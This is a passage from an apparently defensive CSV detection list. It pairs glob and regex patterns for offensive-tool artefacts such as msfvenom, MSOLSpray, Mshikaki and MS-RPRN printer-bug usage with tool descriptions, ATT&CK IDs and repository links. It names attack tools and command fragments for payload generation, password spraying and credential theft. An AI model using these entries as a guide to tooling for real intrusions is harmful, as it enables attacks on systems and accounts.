TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfd.rb*",".{0,1000}msfd\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfdb --component*",".{0,1000}msfdb\s\-\-component.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfdb --use-defaults*",".{0,1000}msfdb\s\-\-use\-defaults.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfdb_helpers*",".{0,1000}msfdb_helpers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfencode*",".{0,1000}msfencode.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfJavaToolkit*",".{0,1000}msfJavaToolkit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msf-json-rpc.*",".{0,1000}msf\-json\-rpc\..{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*msf-json-rpc.ru*",".{0,1000}msf\-json\-rpc\.ru.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msflag.ps1*",".{0,1000}msflag\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*MsfModule*",".{0,1000}MsfModule.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*msfmodule.py*",".{0,1000}msfmodule\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*MsfModuleAsFunction*",".{0,1000}MsfModuleAsFunction.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*msfpattern.*",".{0,1000}msfpattern\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfpayload*",".{0,1000}msfpayload.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfpc.sh*",".{0,1000}msfpc\.sh.{0,1000}","offensive_tool_keyword","msfpc","A quick way to generate various basic Meterpreter payloads via msfvenom (part of the Metasploit framework)","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","0","N/A","N/A","10","1176","267","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" "*msfrelay.py*",".{0,1000}msfrelay\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msf-revhttps*",".{0,1000}msf\-revhttps.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*MSFRottenPotato*",".{0,1000}MSFRottenPotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*MSFRottenPotato.*",".{0,1000}MSFRottenPotato\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msf-sgn.raw*",".{0,1000}msf\-sgn\.raw.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*msfstaged.exe *",".{0,1000}msfstaged\.exe\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*msfupdate_spec.*",".{0,1000}msfupdate_spec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfvemonpayload*",".{0,1000}msfvemonpayload.{0,1000}","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","10","10","38","10","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z" "*msfvenom *",".{0,1000}msfvenom\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*msfvenom -*",".{0,1000}msfvenom\s\-.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfvenom -*",".{0,1000}msfvenom\s\-.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*--msfvenom *",".{0,1000}\-\-msfvenom\s.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*msfvenom -p *",".{0,1000}msfvenom\s\-p\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*msfvenom -p windows/x64/exec*",".{0,1000}msfvenom\s\-p\swindows\/x64\/exec.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Mshikaki.exe*",".{0,1000}Mshikaki\.exe.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","131","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z" "*Mshikaki-main*",".{0,1000}Mshikaki\-main.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","131","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z" "*mshta/shellcode_inject*",".{0,1000}mshta\/shellcode_inject.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*MSHTAStager*",".{0,1000}MSHTAStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*msi-search-main.zip*",".{0,1000}msi\-search\-main\.zip.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*msLDAPDump.py*",".{0,1000}msLDAPDump\.py.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","215","29","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*MSOfficeManipulator.cs*",".{0,1000}MSOfficeManipulator\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*msol_dump*",".{0,1000}msol_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*msol_dump.ps1*",".{0,1000}msol_dump\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*MSOLSpray *",".{0,1000}MSOLSpray\s.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","0","N/A","10","9","827","159","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z" "*MSOLSpray.git*",".{0,1000}MSOLSpray\.git.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","9","827","159","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z" "*MSOLSpray.ps1*",".{0,1000}MSOLSpray\.ps1.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","9","827","159","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z" "*MSOLSpray-master*",".{0,1000}MSOLSpray\-master.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","9","827","159","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z" "*mspass.exe*",".{0,1000}mspass\.exe.{0,1000}","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*mspass.zip*",".{0,1000}mspass\.zip.{0,1000}","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*msquic_openssl/msquic.dll*",".{0,1000}msquic_openssl\/msquic\.dll.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*msquic_openssl/msquic.lib*",".{0,1000}msquic_openssl\/msquic\.lib.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*MS-RPNVulnerableDC.txt*",".{0,1000}MS\-RPNVulnerableDC\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*MS-RPRN.exe *",".{0,1000}MS\-RPRN\.exe\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation From attacking machine entice the Domain Controller to connect using the printer bug. Binary from here https://github.com/leechristensen/SpoolSample","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*MS-RPRN.exe \\* \\*/pipe/pwned*",".{0,1000}MS\-RPRN\.exe\s\\\\.{0,1000}\s\\\\.{0,1000}\/pipe\/pwned.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege 